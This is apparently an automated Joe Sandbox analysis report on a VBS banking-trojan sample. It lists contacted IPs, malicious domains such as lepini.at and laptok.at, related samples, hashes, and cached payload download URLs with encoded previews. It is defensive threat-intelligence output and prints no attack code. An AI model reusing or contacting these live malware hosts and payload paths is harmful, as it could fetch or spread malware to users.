                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://search.ebay.it/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://ns.adobe.cmgRuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.asharqalawsat.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://busca.orange.es/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmpfalse
                                                                                                                                          high

                                                                                                                                          Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          47.241.19.44
                                                                                                                                          unknownUnited States
                                                                                                                                          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                                                          Private

                                                                                                                                          IP
                                                                                                                                          192.168.2.1

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                          Analysis ID:321602
                                                                                                                                          Start date:23.11.2020
                                                                                                                                          Start time:12:17:52
                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 8m 26s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Sample file name:2Q4tLHa5wbO1.vbs
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                          Number of analysed new started processes analysed:35
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:5
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • HDC enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.bank.troj.spyw.evad.winVBS@31/42@10/2
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                                          HDC Information:Failed
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 52
                                                                                                                                          • Number of non-executed functions: 39
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Adjust boot time
                                                                                                                                          • Enable AMSI
                                                                                                                                          • Found application associated with file extension: .vbs
                                                                                                                                          Warnings:
                                                                                                                                          Show All
                                                                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.255.188.83, 51.104.139.180, 104.83.120.32, 168.61.161.212, 52.155.217.156, 20.54.26.129, 205.185.216.42, 205.185.216.10, 152.199.19.161, 92.122.213.194, 92.122.213.247
                                                                                                                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7008 because there are no executed function
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          12:18:51API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                                                                          12:19:28API Interceptor10x Sleep call for process: powershell.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          47.241.19.440wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          2200.dllGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          22.dllGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          9EJxhyQLyzPG.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/
                                                                                                                                          my_presentation_82772.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          resolver1.opendns.com0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          fY9ZC2mGfd.exeGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          H58f3VmSsk.exeGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          2200.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          5faabcaa2fca6rar.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          YjimyNp5ma.exeGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          9EJxhyQLyzPG.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          u271020tar.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          Ne3oNxfdDc.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          5f7c48b110f15tiff_.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          u061020png.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          myip.opendns.comearmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.25
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.25
                                                                                                                                          fY9ZC2mGfd.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.40
                                                                                                                                          H58f3VmSsk.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.40
                                                                                                                                          YjimyNp5ma.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.40
                                                                                                                                          4.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.10
                                                                                                                                          PtgzM1Gd04Up.vbsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.10
                                                                                                                                          Win7-SecAssessment_v7.exeGet hashmaliciousBrowse
                                                                                                                                          • 91.132.136.164
                                                                                                                                          Capasw32.dllGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.80
                                                                                                                                          my_presentation_u6r.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          open_attach_k7u.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          ZwlegcGh.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          dokument9903340.htaGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          look_attach_s0r.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          my_presentation_u5c.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          presentation_p6l.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          job_attach_x0d.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          UrsnifSample.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.78
                                                                                                                                          sample.docmGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.78
                                                                                                                                          3289fkjsdfyu.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.189.150.37
                                                                                                                                          c56.lepini.at0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          2200.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          api3.lepini.at0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          2200.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          9EJxhyQLyzPG.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          C4iOuBBkd5lq-beware-malware.vbsGet hashmaliciousBrowse
                                                                                                                                          • 8.208.101.13
                                                                                                                                          PtgzM1Gd04Up.vbsGet hashmaliciousBrowse
                                                                                                                                          • 8.208.101.13

                                                                                                                                          ASN

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.comGet hashmaliciousBrowse
                                                                                                                                          • 47.254.218.25
                                                                                                                                          0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          videorepair_setup_full6715.exeGet hashmaliciousBrowse
                                                                                                                                          • 47.91.67.36
                                                                                                                                          http://banchio.com/common/imgbrowser/update/index.phpGet hashmaliciousBrowse
                                                                                                                                          • 47.241.0.4
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          1119_673423.docGet hashmaliciousBrowse
                                                                                                                                          • 8.208.13.158
                                                                                                                                          1118_8732615.docGet hashmaliciousBrowse
                                                                                                                                          • 8.208.13.158
                                                                                                                                          https://bit.ly/36uHc4kGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          https://bit.ly/2UkQfiIGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          WeTransfer File for info@nanniottavio.it .htmlGet hashmaliciousBrowse
                                                                                                                                          • 47.254.218.25
                                                                                                                                          https://bit.ly/2K1UcH2Get hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          http://sistaqui.com/wp-content/activatedg.php?utm_source=google&utm_medium=adwords&utm_campaign=dvidGet hashmaliciousBrowse
                                                                                                                                          • 47.254.170.17
                                                                                                                                          https://bit.ly/32NFFFfGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          https://docs.google.com/document/d/e/2PACX-1vTXjxu9U09_RHRx1i-oO2TYLCb5Uztf2wHiVVFFHq8srDJ1oKiEfPRIO7_slB-VnNS_T_Q-hOHFxFWL/pubGet hashmaliciousBrowse
                                                                                                                                          • 47.88.17.4
                                                                                                                                          https://bit.ly/2Itre2mGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B24C39E1-2D7D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):70760
                                                                                                                                          Entropy (8bit):2.029915725001615
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:rBZiZBI2BNl9WBNHwtBNHpNifBNHp0aMezMBNHQF0QGc6qqBBNUQF089ptBNUQwB:rH+VxU4Egjnqty6pE2IS
                                                                                                                                          MD5:2C9E17CA8FA3B14C85503A78AF5EFFB8
                                                                                                                                          SHA1:791AD768DB828A559616E24299C4BE3C41C7582C
                                                                                                                                          SHA-256:6628C6B7F11098030CEF04B561F1A4378C916B2C35EFEE8AD52327A4D43E485C
                                                                                                                                          SHA-512:629807748AC1C7DBC541EA4D9A0FA7D58D2810F5D0B4A2E91A8D18427ADE3D14AE0A1D4F62CA8263D58D94EFE1889D5F6B1919B74B78D254D0A6BA48AD4B625D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B24C39E3-2D7D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):27600
                                                                                                                                          Entropy (8bit):1.9201967726626565
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:rBZXQT6xk7FjR92RIkWR0MRrY5D+FuOY1DPFuO9oA:rHA2i7hR0RMRhRrwDquO0D9uO5
                                                                                                                                          MD5:5A77C8785B4E875796A562A411C8C76C
                                                                                                                                          SHA1:6B483870B3D4B06DAA136B3342F289E450BBB59E
                                                                                                                                          SHA-256:849CFC21C226EEC73CE069D2D3F5F54539BBDBF022A4F587FBC0D221EFE7E135
                                                                                                                                          SHA-512:E1CDF33BC8916754C8EE323B863C90C29E971A7DD4AE6BCB604BEEBE6112DA2F564A4220090862CD62B3664FCAA607DEFD300D340D46EB9171F4D1E76DA45B21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B24C39E5-2D7D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):28172
                                                                                                                                          Entropy (8bit):1.929205872343585
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:ryZOQa6Uk/Fj52QkWOMpYtmidFleid2uA:ruLF5/hIUnpkmofeo2J
                                                                                                                                          MD5:551529A636FC7AEDB6C5D04CE1D14C45
                                                                                                                                          SHA1:C1CA39149400D9D4FF7623B564D682BD20F5BA85
                                                                                                                                          SHA-256:C2965E36A51DE23F8F27E13DCFFC7D2BB85FE744FB263C237CF438961DB77F5D
                                                                                                                                          SHA-512:A61B7969E5131AB50BE48D710EA64BB80E742726CFBADD3E8F4DFA9706948200345E3D081A4E21902FE2D586C038FEDD705CDCE58ACA879564FED16822682FEB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B9675AD6-2D7D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):27728
                                                                                                                                          Entropy (8bit):1.9406359464322147
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:r3ZcQf6hk6Fj524kWaMtY5TPtrYxG1TPXPtrYxf9A:rp1SS6hI8btwTGcTPGpu
                                                                                                                                          MD5:FA98A5F165973053EDE4F517DB598191
                                                                                                                                          SHA1:A8852B04837CBDA495CF390292237092CA83980A
                                                                                                                                          SHA-256:0D406930D2FBF5F26164FEE24EF8E18E33A0E8FF89557132778AEE38A2F077EC
                                                                                                                                          SHA-512:0B0CC4C6E606A5D93EFAB6C2BE54E8924B513E747EE9EDF01FCB2850C0855AB0D7879D18C84A29A818DABBDF8AEF94A057DAE8F8B2A965FE23CCDFA276926642
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\j[1].htm
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):267692
                                                                                                                                          Entropy (8bit):5.9998318720132415
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:44O5Y0gENNNqfVNhLk80e90l74eSNzOKGDXlGkW:44OCGcfdLk2eZTozwD8
                                                                                                                                          MD5:A512480796AAC276DE075C8246DEBFAD
                                                                                                                                          SHA1:7ABAD97BA1DDE2DE12AE13D8B073DD62052DEBCB
                                                                                                                                          SHA-256:69F5D4AAF530E735560A17E4D9D448F3919FD2C2225A4D01ACD7F5314FC01A25
                                                                                                                                          SHA-512:8C2D88DBA729FBC2B3A25276DA1D39794CF87EA1477669FBC3F5FA6E2E77A1BEEFEEA2729E6FE21FF9377A9F0F57D1A9F9C4C1AA45B3F636F81B97EC81389D66
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j
                                                                                                                                          Preview: MXaT+k4mMtUL9eYPx2IlrpVm5upz2PvttLY1qPTY4E7P0iDWMDKUVrMLiWZRLRvv8fPCCk6Ab4dOGpRrKXx4Ox+lZsGcH+jO4f/CbnbUm2cmRY8W1BOz/uHPM/rJ8s4fjc9nWX/FmHC6pFi4dD1tx/NICJ35i3MPfBpSA4GY64F0Ur3KeEfrclI0BzeGwF3qA7fuEEV1m+kR0nqrlJm/BuUQeINp57klIcOxWWjV2ydNiRGATvFjJNuQhVgJfmqRRhcVhr9xngUX46tyJNRjZg8mgsm2m/4VqELy7yPhsqdPmlKQqjWNIAV8Irw8JMW+kVEQU3ydu6VcxfXll6Y6gcCm7PTQc2b9bjA2CDJIV5JhuN7gwUm9hjJOiexpiqjlpgqYgdJYuQ1s3Xxm9wFaH+QHK8Mdi+00b27kP95+ShYR5jGL7sI/es25tH74WYMMnUJcxMVKbiMdPJwpw8qXwFabtH3NRNY7zPxXhnaYzQYdSI7ousMyu87rR9HPZm6eOw9yzTW9qZlUNSZ11gAHiL8OibrLhAlnNzv85wNllktyqBSvPha3Mr+mIQlPGfNfpVVEAAQZzPZTRigtxJMTriCNHAI8anMKk9+jBYR48GNMTcA7jcUG3UkA8f1Ky/0fU4/E53kH8jjCss9FJe502wloYjbNRdxu6eia/0Mmg9uNi6UMD3uB4WHJqRqXuYIIdQhOa1pnOwSK6UiSsIMkT/aD2g1AoAjnbzFhdnn4y66JzdHsRG3lY03SwDpsxuddvjfg4eX0RVcXlJgvP6SNUnAVzzVtsSp3fKeX8r/O+0kIgjEOhoX9aHB0aS4uk2+lShYKR/LjHsZ46HdY3gu1BXC9XKdSDvf1sFERSKj4fxM6KwhtAWh9rgVrVZpFwAZBGTlXS5RQK7oWxPu0y4piw26SHKllj2TnMNiEDk3/v6cMtKz4bSo8e3RSVtnqrmcBCxak/8abhsddRrj4IStq2/bo1Fa6PLwpkP/iK13A
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Gfdfp[1].htm
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):2400
                                                                                                                                          Entropy (8bit):5.982959048236587
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:BXb1tWWNj65eUdL8F8AvD/5skoHa3NBMO9YcQuOa/LEQd5W5Wu+8:ntWWF65ng9Dh0H8MO8lOzu+8
                                                                                                                                          MD5:29F9204F23026C595F6E2A549DB446C7
                                                                                                                                          SHA1:B81892FDF6C46415746B10D79B1099930D2BD2F5
                                                                                                                                          SHA-256:73F4F79CCED31F9B899FDCF1C2CAF1D66613538B1719A4E8A80DEEBB71D81206
                                                                                                                                          SHA-512:C008854797984179456066FF68CBFC8F732F510965D9B2069BC6CEF9DB99DD59EC908DAFC9889CD08B8357418982A3DD89983FA51585CDD24E5C2E4CC91E457A
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://api10.laptok.at/api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp
